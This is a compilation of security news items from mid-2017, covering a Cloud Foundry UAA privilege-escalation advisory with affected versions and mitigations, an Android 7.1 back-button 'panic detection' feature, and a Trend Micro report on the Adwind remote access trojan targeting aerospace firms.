“In Cloud Foundry cf-release versions prior to v264; UAA release all versions of UAA v2.x.x, 3.6.x versions prior to v3.6.13, 3.9.x versions prior to v3.9.15, 3.20.x versions prior to v3.20.0, and other versions prior to v4.4.0; and UAA bosh release (uaa-release) 13.x versions prior to v13.17, 24.x versions prior to v24.12. 30.x versions prior to 30.5, and other versions prior to v41, zone administrators are allowed to escalate their privileges when mapping permissions for an external provider.” reads the description published by the Mitre.

The vulnerability affects the following versions of UAA and cf-release versions prior to v264:

UAA release:
All versions of UAA v2.x.x
3.6.x versions prior to v3.6.13
3.9.x versions prior to v3.9.15
3.20.x versions prior to v3.20.0
Other versions prior to v4.4.0
UAA bosh release (uaa-release):
13.x versions prior to v13.17
24.x versions prior to v24.12
30.x versions prior to 30.5
Other versions prior to v41
The Cloud Foundry security advisory highlights that a foundation is vulnerable only if all of the following conditions are satisfied:

You are using multiple zones in UAA
You are giving out admin privileges for managing external providers (LDAP/SAML/OIDC) and corresponding group mappings
You have enabled LDAP/SAML/OIDC providers and external group mappings
Cloud Foundry suggests making one of these conditions false to mitigate the threat.

Revising any of these settings serves as a mitigation ahead of implementing a patch, Cloud Foundry says.

The advisory includes the link to upgrade both Cloud Foundry users to version 264 or later and standalone UAA users that have to install the 3.x.x series.


Google Silently Adds 'Panic Detection Mode" to Android 7.1 – How It's Useful
11.7.2017 thehackernews  Android
How often do you click the 'back' or the ‘Home’ button on your mobile device to exit an application immediately?
I believe, several times in a single day because a large number of apps do not have an exit button to directly force-close them instead of going back and back and back until they exit.
Sometimes Android users expect the back button to take them back to the back page, but sometimes they really want to exit the app immediately.
Often this has severe usability implications when a majority of users are already dealing with their low-performance mobile devices and believe that clicking back button multiple times would kill the app and save memory, but it doesn't.
Google has now addressed this issue and silently included a feature within Android 7.1 Nougat that allows users to exit from apps by pressing the 'back' key successively within 0.3 seconds for over four times.
Dubbed "Panic Detection Mode," the feature runs in the background of Android operating system and detects panic in situations when a user repeatedly presses the back button on their smartphone to exit an app and allows the operating system to override the application and send the user safely back to the home screen.

While Google did not publicly make any announcement about the panic detection mode feature, XDA Developers yesterday unearthed the feature within the source code of Android 7.1 Nougat.
Since then a number of media outlets described Android 7.1 Nougat Panic Detection Mode as a security feature that protects Android devices from malicious applications.
It has been reported as a new security feature that looks for the number of times a user presses the back button within a certain amount of time and allows users to exit from the apps that go rogue and try to take control of user's device.
But the feature seems to be developed by Google engineers keeping usability as a priority, instead of security in mind.
Because activating panic detection mode neither automatically detects a malicious app and report back to Google, nor it behaves differently for a legitimate app.
However, it can help Android users in some cases to kill rogue app instantly; but again it’s up to users if they are able to identify malicious apps themselves and want to remove them manually.
So, this feature is also useful if a malicious application takes control over the display and prevents you from backing out of it.
The 'panic detection mode' feature is currently limited to the devices running Android 7.1 Nougat, and not available for all the Android users, XDA Developers pointed out. The feature also needs to be manually enabled by the user.
Google fights enough to keep its Android operating system safe and secure, but malware and viruses still make their ways into its platform, especially through malicious apps even on Google's own Play Store.
It appears that Google also has plans for wider implementation of the 'panic detection mode' feature in the upcoming version of its Android OS and would most likely make it enabled by default in the future releases.


Adwind RAT Returns! Cross-Platform Malware Targeting Aerospace Industries
11.7.2017 thehackernews 
Virus

Hackers and cyber criminals are becoming dramatically more adept, innovative, and stealthy with each passing day.
While other operating systems are more widely in use, cybercriminals have now shifted from traditional activities to more clandestine techniques that come with limitless attack vectors, support for cross platforms and low detection rates.
Security researchers have discovered that infamous Adwind, a popular cross-platform Remote Access Trojan written in Java, has re-emerged and currently being used to "target enterprises in the aerospace industry, with Switzerland, Austria, Ukraine, and the US the most affected countries."
Adwind — also known as AlienSpy, Frutas, jFrutas, Unrecom, Sockrat, JSocket, and jRat — has been in development since 2013 and is capable of infecting all the major operating systems, including Windows, Mac, Linux, and Android.

Adwind has several malicious capabilities including stealing credentials, keylogging, taking pictures or screenshots, data gathering and exfiltrate data. The trojan can even turn infected machines into botnets to abuse them for destructing online services by carrying out DDoS attacks.
Researchers from Trend Micro recently noticed a sudden rise in the number of Adwind infections during June 2017 — at least 117,649 instances in the wild, which is 107 percent more than the previous month.
According to a blog post published today, the malicious campaign was noticed on two different occasions.
First was observed on June 7 and used a link to divert victims to their .NET-written malware equipped with spyware capabilities, while the second wave was noticed on June 14 and used different domains hosting their malware and command-and-control servers.
Both waves eventually employed a similar social engineering tactic to trick victims into clicking the malicious links within a spam email that impersonate the chair of the Mediterranean Yacht Broker Association (MYBA) Charter Committee.
Once infected, the malware also collects system's fingerprints, along with the list of installed antivirus and firewall applications.
"It can also perform reflection, a dynamic code generation in Java. The latter is a particularly useful feature in Java that enables developers/programmers to dynamically inspect, call, and instantiate attributes and classes at runtime. In cybercriminal hands, it can be abused to evade static analysis from traditional antivirus (AV) solutions," the researchers wrote.
My advice for users to remain protected from such malware is always to be suspicious of uninvited documents sent over an email and never click on links inside those documents unless verifying the source.
Additionally, keep your systems and antivirus products up-to-date in order to protect against any latest threat.